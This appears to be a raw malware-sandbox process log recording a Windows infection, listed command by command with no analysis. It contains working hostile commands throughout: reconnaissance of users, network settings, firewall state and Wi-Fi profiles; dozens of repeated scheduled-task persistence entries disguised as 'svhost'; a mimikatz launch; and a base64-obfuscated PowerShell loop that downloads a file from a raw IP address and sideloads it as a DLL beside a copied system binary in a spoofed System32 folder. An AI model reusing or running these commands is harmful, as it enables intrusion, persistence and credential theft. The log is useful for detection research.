C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Users\Admin\AppData\Local\Temp\2641813856.exe
C:\Users\Admin\AppData\Local\Temp\2641813856.exe
C:\Users\Admin\Desktop\Files\win.exe
"C:\Users\Admin\Desktop\Files\win.exe"
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\SysWOW64\route.exe
route print
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4dCnvsGHvDiU.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\arp.exe
arp -a 10.127.0.1
C:\Windows\system32\HOSTNAME.EXE
hostname
C:\Windows\System32\Wbem\WMIC.exe
wmic logicaldisk get caption,description,providername
C:\Windows\system32\net.exe
net user
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user
C:\Windows\system32\query.exe
query user
C:\Windows\system32\quser.exe
"C:\Windows\system32\quser.exe"
C:\Windows\system32\net.exe
net localgroup
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup
C:\Windows\system32\net.exe
net localgroup administrators
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators
C:\Windows\system32\net.exe
net user guest
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user guest
C:\Windows\system32\net.exe
net user administrator
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user administrator
C:\Windows\System32\Wbem\WMIC.exe
wmic startup get caption,command
C:\Users\Admin\sysnldcvmr.exe
C:\Users\Admin\sysnldcvmr.exe
C:\Windows\system32\tasklist.exe
tasklist /svc
C:\Windows\system32\ipconfig.exe
ipconfig /all
C:\Windows\system32\ROUTE.EXE
route print
C:\Windows\system32\ARP.EXE
arp -a
C:\Windows\system32\NETSTAT.EXE
netstat -ano
C:\Windows\system32\sc.exe
sc query type= service state= all
C:\Windows\system32\netsh.exe
netsh firewall show state
C:\Windows\system32\netsh.exe
netsh firewall show config
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\2755424256.exe
C:\Users\Admin\AppData\Local\Temp\2755424256.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tL6XnagKaIgV.bat" "
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif
C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif
C:\Users\Admin\AppData\Local\Temp\1716412561.exe
C:\Users\Admin\AppData\Local\Temp\1716412561.exe
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7BKgyAACbrJA.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\386833483.exe
C:\Users\Admin\AppData\Local\Temp\386833483.exe
C:\Users\Admin\AppData\Local\Temp\1259121635.exe
C:\Users\Admin\AppData\Local\Temp\1259121635.exe
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CA5zFxSvwcz3.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\1592010501.exe
C:\Users\Admin\AppData\Local\Temp\1592010501.exe
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KpJaritWY7Wn.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Z6r9qEeCxRa3.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aViE447TG4FZ.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YyhvHPvCwEdk.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zewdvRql0rBF.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XOkfOCapixH2.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XWV5LILmwDkB.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tqd9bvEpV0ua.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\mimikatz.exe
"C:\Users\Admin\Desktop\Files\mimikatz.exe"
C:\Users\Admin\Desktop\Files\pyl64.exe
"C:\Users\Admin\Desktop\Files\pyl64.exe"
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ftw3mqLVpZtH.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\cmd.exe
cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Zm9yICg7Oyl7DQoJKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgiaHR0cDovLzM3LjEuMTk2LjM1L3VuMi9ib3R1aS5kYXQiLCAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIik7DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyA2MDsNCgl9DQp9')); Invoke-Expression $decoded;"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Zm9yICg7Oyl7DQoJKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgiaHR0cDovLzM3LjEuMTk2LjM1L3VuMi9ib3R1aS5kYXQiLCAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIik7DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyA2MDsNCgl9DQp9')); Invoke-Expression $decoded;"
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sLyrJp9hZt1l.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TvXcYRAMCmLa.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\v1MqV8zS0keO.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WED4FLMtlykw.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\P735ONMHFgAv.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MgWZXJj8dCjb.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gNnc9t1MefMS.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eWdLSNzWVWXx.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ClAP8OY0qr7E.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mnB15KcaDiYm.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Gx59zxdPG3VG.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\l0sKY7ywAZNP.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C0h7HxYaBUBo.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Wx6Kph6nz0Zz.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vh0wSPmbBKyc.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zhedrrgYdTXc.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\r1Ny2AwHZby2.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\d0KT3AhTwW64.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ccP8MoMSkZZY.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\phQRykera6C2.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\F2sRNGlhbro7.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SgiXdtrMxqTA.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RJf0VG3ZT1TF.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WSrXY5OEpBpo.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
